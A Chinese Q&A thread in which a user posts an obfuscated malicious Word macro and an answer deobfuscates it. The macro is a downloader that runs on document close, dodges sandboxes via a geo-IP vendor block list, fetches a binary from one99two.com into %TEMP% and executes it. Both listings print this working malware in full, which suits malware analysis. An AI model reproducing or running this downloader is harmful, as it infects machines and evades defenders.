这个恶意vba代码到底是做什么的?

时间:2016-08-09 09:57:29

标签: vba ms-word word-vba

我刚刚在工作场所收到了这个带宏的文档,里面包含下面这段恶意宏代码。由于 vb.net 不是我的强项,我无法弄清楚它的作用。这是我在文档中找到的唯一一个宏;由于代码被严重混淆,我认为它是恶意的。

Public Sub Document_Close()
' Auto-executing entry point: Word runs this event handler when the document
' is closed, so the payload fires without any button or prompt.
' The error handler turns every failure -- including the deliberate
' Err.Raise bail-outs in UWaFZ -- into a silent exit, so nothing is shown
' to the user.
On Error GoTo SWuc
ZQZf
Exit Sub
SWuc:
End Sub
Public Sub ZQZf()
' Payload routine reached from Document_Close.  Every string literal is
' rebuilt at run time by s(), so no readable ProgID, URL or method name
' appears in the source; the decoded values noted below agree with the
' deobfuscated listing further down the page.  CallByName's third
' argument is the VbCallType: 1 = VbMethod, 2 = VbGet, 4 = VbLet.
Dim vmKT As String
Dim UwuV As String
' PUQqU = ThisDocument.Application
Set PUQqU = CallByName(ThisDocument, s(61, "pocpiiAtlna", 107), 2)
' Environment checks: bail out (raised error, swallowed by Document_Close)
' when Application.UserName is "USER" ...
If CallByName(PUQqU, s(74, "mrUaeeNs", 29), 2) = s(31, "RESU", 35) Then UWaFZ (s(40, "uadrBsm naee", 89))
' ... or when Application.RecentFiles.Count is below 3 -- presumably an
' attempt to recognise a freshly built analysis machine; verify against
' the decoded "Bad history" message.
If CallByName(CallByName(PUQqU, s(41, "liFtneceRse", 109), 2), s(33, "tonCu", 8), 2) < 3 Then UWaFZ (s(72, "sih daByrot", 32))
' mVEL = CreateObject("WinHttp.WinHttpRequest.5.1").  First request:
' Open "GET" <geo-IP lookup URL> False, with Referer and User-Agent
' headers, then Send -- the host asks a public service who its own
' IP address belongs to.
Set mVEL = qizB(s(271, "5n.tq.ipHetWtnRs1tipe.HWtu", 99))
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(414, "m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn", 151), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(62, "eeerrfR", 52), s(399, "arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn", 452)
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
' Status >= 400 -> "Can't locate IP address" (the lookup is mandatory:
' without it the sample refuses to continue).
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(29, "'PnIa Cestsaecrodld at ", 67))
' vmKT = ResponseText.  Each OImbM entry (hosting providers and security
' vendors) is searched for case-insensitively; a match aborts with
' "Bad ISP: <name>".  This is what makes the sample stay dormant on
' cloud sandboxes and vendor networks.
vmKT = CallByName(mVEL, s(115, "esnopseRtxeT", 71), 2)
For Each ofJE In OImbM
If InStr(LCase(vmKT), LCase(ofJE)) <> 0 Then UWaFZ (s(67, " daB:PSI", 23) & ofJE)
Next
' Second request on the same object: GET of the payload binary (URL in
' the deobfuscated listing), same User-Agent, Send, Status >= 400 ->
' "Can't download binary file".
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(237, "pnwm/cbtotoii.t/9cgf6h/9.cf1n:eo/oei", 101), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(261, "rCo  nniitoaeddyawbf'lnl a", 249))
' zGFN = CreateObject("WScript.Shell").Environment("PROCESS");
' UwuV = %TEMP% & Application.PathSeparator & "tmp8213.tmp" -- the drop path.
Set zGFN = CallByName(qizB(s(108, "lpltW.SSchrei", 41)), s(97, "nemnorivnEt", 43), 2, s(17, "OSCPERS", 9))
UwuV = zGFN(s(23, "PMET", 7)) & CallByName(PUQqU, s(74, "arapeShtaProt", 77), 2) & s(46, "1tt83mm2.pp", 37)
' wATB = CreateObject("ADODB.Stream"): .Type = 1 (adTypeBinary, via VbLet),
' .Open, .Write ResponseBody, .SaveToFile UwuV, 2 (overwrite), .Close.
Set wATB = qizB(s(128, "BmSDrDa.AtOe", 19))
CallByName wATB, s(17, "yTep", 11), 4, 1
CallByName wATB, s(27, "nepO", 11), 1
CallByName wATB, s(41, "rWeti", 29), 1, CallByName(mVEL, s(32, "BesyooseRndp", 101), 2)
CallByName wATB, s(35, "olaTiSeFev", 37), 1, UwuV, 2
CallByName wATB, s(8, "solCe", 14), 1
' CreateObject("WScript.Shell").Exec UwuV -- runs the dropped file.
' Observable chain for detection: Word issuing WinHTTP requests, a .tmp
' written under %TEMP% through ADODB.Stream, then WScript.Shell spawning it.
CallByName qizB(s(108, "lpltW.SSchrei", 41)), s(31, "cexE", 7), 1, UwuV
End Sub
Public Function OImbM()
    ' Builds the block-list of hosting-provider and security-vendor names
    ' that ZQZf looks for in the geo-IP response (decoded values are shown
    ' in GetBadISPList further down the page).  rHOu is a pass-through that
    ' returns its argument unchanged.
    Dim blockList As Variant
    blockList = Array( _
        s(7, "MANOZA", 29), s(71, "OYOSNNMUA", 59), s(60, "DTNIEBFREED", 86), s(11, "ULBTAOC E", 26), _
        s(101, "TSS SMIOYECCS", 139), s(41, "OCULD", 7), s(83, "EC ATADRETN", 109), s(15, "ECATADRETN", 69), _
        s(107, "ARETENADTC", 93), s(47, "EADCDIEDT", 34), s(99, "P,SO ELSTE", 93), s(54, "IYREEFE", 9), _
        s(17, "TRPNOEIFCO", 27), s(66, "ROFTENIT", 31), s(71, "EHRENZT", 69), s(16, "ETSOHD", 59), _
        s(65, "SOHGNIT", 27), s(22, "ABEEESLW", 77), s(85, "COISMOTRF", 61), s(23, "ECROFN", 35), _
        s(12, "SSV AOH", 74), s(95, "PNRFIPOOTO", 37), s(41, "ISUTERYC", 51), s(13, "ESREVR", 29), _
        s(205, "HOGETL SNNICROTSOGE", 46), s(89, "RTEDMCORN I", 17), s(15, "AWTSURTEV", 62), _
        s(19, "RAIO RNHEATMC", 75), s(44, "AUORCLPKEKBMCTASO", 80), s(25, "AMESICTM", 59), _
        s(11, "RTORCIMDNE", 99))
    OImbM = rHOu(blockList)
End Function
Public Sub UWaFZ(ByVal ltfqE As String)
    ' Bail-out helper: raises run-time error 2 carrying ltfqE as its
    ' description.  The error unwinds to Document_Close, whose handler
    ' discards it, so each environment check ends the macro silently.
    Const AbortErrorNumber As Long = 2
    Err.Raise AbortErrorNumber, , ltfqE
End Sub
Public Function qizB(ByVal DVnR As String)
    ' CreateObject wrapper: instantiates the COM class whose ProgID is DVnR
    ' and hands it back through the identity function feZmA.  Presumably the
    ' indirection exists so that CreateObject never appears next to a
    ' readable ProgID in the source -- confirm against the other helpers.
    Dim created As Object
    Set created = CreateObject(DVnR)
    Set qizB = feZmA(created)
End Function
Public Function feZmA(ByVal jfcO As Object)
    ' Identity pass-through for object references: returns jfcO unchanged.
    ' It adds one more call layer between CreateObject and its use.
    Dim passthrough As Object
    Set passthrough = jfcO
    Set feZmA = passthrough
End Function
Public Function rHOu(ByVal iMqIc)
    ' Identity pass-through for Variants (OImbM routes its Array through it).
    ' Returns iMqIc unchanged.
    Dim passthrough As Variant
    passthrough = iMqIc
    rHOu = passthrough
End Function
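Public Function s(ByVal DDniC As Integer, ByVal Sfrf As String, ByVal QuJk As Integer) As String
    ' String decoder used for every literal in the macro.  Sfrf holds the
    ' target text with its characters scrambled; the decoder starts at the
    ' 0-based index (DDniC Mod Len(Sfrf)), emits the character found there,
    ' advances by QuJk positions (again modulo the length) and repeats until
    ' Len(Sfrf) characters have been produced.  The walk is a permutation of
    ' Sfrf only when QuJk and Len(Sfrf) are coprime, which the embedded
    ' calls rely on.
    '
    ' DDniC: starting offset, reduced modulo the string length.
    ' Sfrf:  scrambled characters.
    ' QuJk:  stride between successive characters.
    ' Returns the unscrambled text.  An empty Sfrf yields "" (the original
    ' hand-rolled modulo helper raised "Division by zero" for that input).
    '
    ' The hand-rolled helpers GzSvR (modulo) and gOtmH (character at index)
    ' are replaced by Mod and Mid$, which behave identically for the
    ' in-range, non-negative values this routine produces.
    Dim keyLength As Long
    Dim pos As Long
    Dim decoded As String

    keyLength = Len(Sfrf)
    If keyLength = 0 Then Exit Function   ' nothing to decode; avoids Mod by zero

    ' Long locals so pos + QuJk cannot overflow Integer for large strides.
    pos = DDniC Mod keyLength
    Do While Len(decoded) < keyLength
        ' Mid$ is 1-based; pos is a 0-based index into Sfrf.
        decoded = decoded & Mid$(Sfrf, pos + 1, 1)
        pos = (pos + QuJk) Mod keyLength
    Loop
    s = decoded
End Function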
Public Function gOtmH(ByVal vdHA As String, ByVal qnJn As Integer) As String
    ' Returns the character at 0-based index qnJn of vdHA: the string is
    ' trimmed to its first qnJn + 1 characters and the last of those is kept.
    ' Edge behaviour of this form (preserved): when qnJn + 1 exceeds the
    ' length, Left returns the whole string, so the LAST character comes
    ' back rather than "".
    Dim prefix As String
    prefix = Left$(vdHA, qnJn + 1)
    gOtmH = Right$(prefix, 1)
End Function
Public Function GzSvR(ByVal JtMKn As Integer, ByVal PfnR As Integer) As Integer
    ' Hand-rolled modulo, originally written as JtMKn - PfnR * (JtMKn \ PfnR).
    ' Because \ truncates toward zero, that expression equals VBA's Mod for
    ' every Integer input: the result carries the sign of JtMKn, and
    ' PfnR = 0 raises "Division by zero" in both forms.
    GzSvR = JtMKn Mod PfnR
End Function

1 个答案:


警告:请勿运行此代码(也不要运行提问者贴出的原始代码)

这是一个二进制文件下载器,至少在 VBA 这一侧只是 script-kiddie 级别的代码。我对它做了去混淆、把被混淆的名称替换为有意义的名称,并将一些函数调用内联,结果如下:

Public Sub Document_Close()
    ' Auto-executing entry point (runs when the document is closed).
    ' Any error raised inside MaliciousCode -- each of its checks aborts by
    ' raising one -- lands on QuietExit and is discarded, so the user never
    ' sees a message.
    On Error GoTo QuietExit
    MaliciousCode
    Exit Sub
QuietExit:
End Sub

Public Sub MaliciousCode()
    ' Deobfuscated rendering of ZQZf from the original macro, with the
    ' answerer's guard inserted as the first statement so the routine
    ' raises and returns before doing anything else.
    Err.Raise 666, , "Do not execute this."  'NOTE: I added this ;-)

    Dim response As String
    Dim filePath As String

    ' Environment checks.  NOTE(review): in these Err.Raise calls the text
    ' is passed as the second positional argument (Source), whereas the
    ' original UWaFZ passes it as Description:= -- harmless here since the
    ' error is swallowed, but the message lands in Err.Source, not
    ' Err.Description.
    Set wdApp = ThisDocument.Application
    If wdApp.UserName = "USER" Then Err.Raise 2, "Bad username"
    If wdApp.RecentFiles.Count < 3 Then Err.Raise 2, "Bad history"

    ' Step 1: ask a public geo-IP service about the host's own address.
    Set webRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    webRequest.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
    webRequest.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't locate IP address"

    ' Step 2: stay dormant if the response names a hosting provider or a
    ' security vendor (case-insensitive substring match).
    response = webRequest.ResponseText
    For Each isp In GetBadISPList
        If InStr(LCase(response), LCase(isp)) <> 0 Then Err.Raise 2, "Bad ISP: " & isp
    Next

    ' Step 3: fetch the payload with the same request object.
    webRequest.Open "GET", "http://one99two.com/cgi/office16.bin", False
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't download binary file"

    ' Step 4: write the body to %TEMP%\tmp8213.tmp through ADODB.Stream.
    Set env = CreateObject("WScript.Shell").Environment("PROCESS")
    filePath = env("TEMP") & wdApp.PathSeparator & "tmp8213.tmp"
    Set outStream = CreateObject("ADODB.Stream")
    ' NOTE(review): the original literally assigns Type = 1 (adTypeBinary);
    ' without an ADODB reference the named constant is undeclared here.
    outStream.Type = adTypeBinary
    outStream.Open
    outStream.Write webRequest.ResponseBody
    ' NOTE(review): the original passes the path and the value 2
    ' (overwrite) to SaveToFile; this transcription dropped both arguments.
    outStream.SaveToFile
    outStream.Close

    ' Step 5: execute the dropped file.  Word -> WinHTTP -> .tmp in %TEMP%
    ' -> WScript.Shell.Exec is the chain a detection rule can key on.
    CreateObject("WScript.Shell").Exec filePath
End Sub

Public Function GetBadISPList()
    ' Block-list of hosting-provider and security-vendor names.  Any of
    ' these appearing in the geo-IP response makes MaliciousCode abort, so
    ' the sample avoids running on cloud sandboxes and vendor networks.
    Dim names As Variant
    names = Array( _
        "AMAZON", "ANONYMOUS", "BITDEFENDER", "BLUE COAT", _
        "CISCO SYSTEMS", "CLOUD", "DATA CENTER", "DATACENTER", _
        "DATACENTRE", "DEDICATED", "ESET, SPOL", "FIREEYE", _
        "FORCEPOINT", "FORTINET", "HETZNER", "HOSTED", _
        "HOSTING", "LEASEWEB", "MICROSOFT", "NFORCE", _
        "OVH SAS", "PROOFPOINT", "SECURITY", "SERVER", _
        "STRONG TECHNOLOGIES", "TREND MICRO", "TRUSTWAVE", "NORTH AMERICA", _
        "BLACKOAKCOMPUTERS", "MIMECAST", "TRENDMICRO")
    GetBadISPList = names
End Function

下载站点注册于巴基斯坦,并已被 Google 标记为恶意网站。请注意,我最初怀疑它是一个僵尸网络(bot-net)安装程序,依据是它会获取 IP 地址;但现在看来,这更像是一种粗糙的手段,用来避免在托管平台和杀毒厂商的网络中运行。二进制文件本身可以是任何东西。

VirusTotal 对该文件没有任何命中,原因显然是混淆。而上面去混淆后的代码确实能得到一些命中。